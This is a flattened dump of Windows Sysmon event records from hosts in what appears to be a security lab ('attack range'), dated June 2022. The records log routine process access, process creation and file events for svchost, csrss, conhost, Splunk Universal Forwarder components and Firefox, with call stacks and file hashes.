14:18:19.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.851{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.851{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-182B-629A-5042-000000005F02}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.851{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-182B-629A-5042-000000005F02}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.852{2E1864BB-182B-629A-5042-000000005F02}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044261Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:19.392{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F56A0911EB954710853712B3A734D65,SHA256=734792539CA277EF524E728E6C9011C02A9AEDB5C8E0206D19F3CDA951B2626D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.516{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE723FA62EDE2CFA8B03C6DA09383BB8,SHA256=48F4AAFC051CDBA2E5690B48FFDFC2F639D3F36174DD984E1C458E33729E565E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.481{2E1864BB-182B-629A-4F42-000000005F02}51767756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.280{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-182B-629A-4F42-000000005F02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.280{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.280{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.280{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.280{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.280{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-182B-629A-4F42-000000005F02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.280{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-182B-629A-4F42-000000005F02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.281{2E1864BB-182B-629A-4F42-000000005F02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.034{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=6969785D25F4014CCF474F9A02DBBD20,SHA256=946F963B3536A94367E12DE5D0B7DA6258C573B6E576AE5FFFEBCC5CFD5F5F1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.921{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0C76E2CB04033B7E2A6FE045BB88EE7,SHA256=7B93F07B3CF30A7DA47E7FD60A4259B03B04B39A640F04C01361C13CEC332870,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044263Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:20.486{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5DA1FD2619AE80C951DF4F76160E976,SHA256=5D31C919B7F2460ACABAC04AF373B81B781C5A1C2E7780EED30858AEF868083A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.769{2E1864BB-182C-629A-5142-000000005F02}2162604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.535{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-182C-629A-5142-000000005F02}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.535{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.535{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.535{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.535{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.535{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-182C-629A-5142-000000005F02}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.535{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-182C-629A-5142-000000005F02}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:20.536{2E1864BB-182C-629A-5142-000000005F02}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000205379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 